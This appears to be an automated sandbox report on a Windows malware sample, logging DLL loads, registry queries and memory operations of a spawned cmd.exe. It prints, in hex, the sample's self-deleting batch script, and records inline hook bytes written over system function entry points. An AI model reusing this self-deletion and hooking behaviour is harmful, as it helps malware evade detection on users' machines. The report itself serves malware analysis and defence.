\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 8B0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 8B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8C0000 262144 own pid read write success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address
0 0 false 738 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2 1001E31
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2661259722
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2661267641
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2661277737
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2661279116
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2661279846
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2661287272
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2661288784
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2661289159
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2661294689
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2661303106
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2661311261
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2661319300
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2661337096
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2661338521
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2661345802
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid object name not found 2661353661
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2661355489
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2661361298
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2661372811
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2661375660
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2661378027
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid object name not found 2661393989
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2661395689
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2661409284
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2661415727
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2661417494
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2661423120
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2661426222
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2661433006
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2661442812
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2661449094
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2661450655
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2661459517
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2661521607
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2661543812
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2661546221
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1010000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2661690649
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2661734771
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2661738019
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2661748955
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2661751918
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2661754237
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2661788077
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2661804583
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2661836005
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2661954634
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2661957210
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2661965145
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2661975737
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 738 HWNDs: 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2661982569
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 738 HWNDs: 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2661983179
Analysis File: cmd.exe PID: 2152 Parent PID: 580
+ Sections
+ General
Start time: 05:45:24
Start date: 08/12/2011
Path: C:\WINDOWS\system32\cmd.exe
Commandline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 16A4FF
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 4AD02F12
+ File deleted
File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 1 4AD17D07
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 1 4AD17D07
+ File read
File Path Offset Length Value Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 61 63 38 64 31 32 37 34 2E 62 61 74 22 0D 0A 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A success or wait 1 4AD069F8
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat PositionInformation Offset: 0 success or wait 24 4AD069B5
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 2F0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 310000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 360000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 3B0000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 3B0000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 3B0000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 77F10000 299008 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 3C0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 500000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 500000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 510000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 490000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 490000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 9F0000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 9F0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 4C0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 4C0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 4C0000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 9F0000 618496 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat query and read commit A80000 4096 own pid readonly success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 9F0000 618496 own pid readonly object name not found 1 164018
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 164018
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 164018
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 164018
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1 164018
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1 164018
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1 164018
C:\WINDOWS\system32\wininet.dll read commit 9F0000 667648 own pid readonly success or wait 1 164018
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1 164018
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor EnableExtensions success or wait 2 4AD04A4F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DelayedExpansion object name not found 2 4AD04A88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DefaultColor success or wait 2 4AD04AAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor PathCompletionChar success or wait 1 4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun success or wait 1 4AD04BB8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor PathCompletionChar object name not found 1 4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun object name not found 1 4AD04BB8
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Enabled object name not found 1 155EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} EnabledV8 success or wait 1 155EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} CleanCookies success or wait 1 155FBA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} CleanCookies success or wait 1 155EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} 1406 success or wait 5 155EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} 1609 success or wait 5 155EB7
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
2152 C:\WINDOWS\system32\cmd.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 16F078
2152 C:\WINDOWS\system32\cmd.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 16F078
2152 C:\WINDOWS\system32\cmd.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 16F078
2152 C:\WINDOWS\system32\cmd.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 16F078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
2152 C:\WINDOWS\system32\cmd.exe A90000 10 B8 35 00 00 00 E9 A9 D1 E7 7B success or wait 1 16F0EC
2152 C:\WINDOWS\system32\cmd.exe 7C90D1AE 5 E9 A4 AE 85 83 success or wait 1 16F11A
2152 C:\WINDOWS\system32\cmd.exe A9000A 10 68 6C 02 00 00 E9 1E 63 E8 7B success or wait 1 16F0EC
2152 C:\WINDOWS\system32\cmd.exe 7C91632D 5 E9 09 1F 85 83 success or wait 1 16F11A
2152 C:\WINDOWS\system32\cmd.exe A90014 10 8B FF 55 8B EC E9 A3 2E 78 76 success or wait 1 16F0EC
2152 C:\WINDOWS\system32\cmd.exe 77212EBC 5 E9 FD 4B F4 88 success or wait 1 16F11A
2152 C:\WINDOWS\system32\cmd.exe A9001E 10 8B FF 55 8B EC E9 7E 60 73 76 success or wait 1 16F0EC
2152 C:\WINDOWS\system32\cmd.exe 771C60A1 5 E9 6F 1A F9 88 success or wait 1 16F11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
2152 C:\WINDOWS\system32\cmd.exe 9F0000 2DF8C8 page read and write success or wait 1 16A5EB
2152 C:\WINDOWS\system32\cmd.exe 9F0000 2DF8CC page read and write success or wait 1 16A5EB
2152 C:\WINDOWS\system32\cmd.exe A70000 13FE10 page read and write success or wait 1 4AD04578
2152 C:\WINDOWS\system32\cmd.exe A90000 2DF4C0 page execute and read and write success or wait 1 173FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2152 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 16F04F
2152 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 16F134
2152 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 16F04F
2152 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 16F134
2152 C:\WINDOWS\system32\cmd.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 16F04F
2152 C:\WINDOWS\system32\cmd.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 16F134
2152 C:\WINDOWS\system32\cmd.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 16F04F
2152 C:\WINDOWS\system32\cmd.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 16F134
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2817992848
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2818043301
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 2F0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2818126990
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 310000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2818164592
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 360000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2818203326
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 3B0000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2818216502
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 3B0000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2818242490
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 3B0000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2818247392
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2818618645
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2818698576
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2818709297
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 2818794751
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2818796531
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 3C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2819430400
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 500000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2819672837
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 500000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2819690276
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2819697463
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2819738350
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2819780731
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2819837738
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2819915709
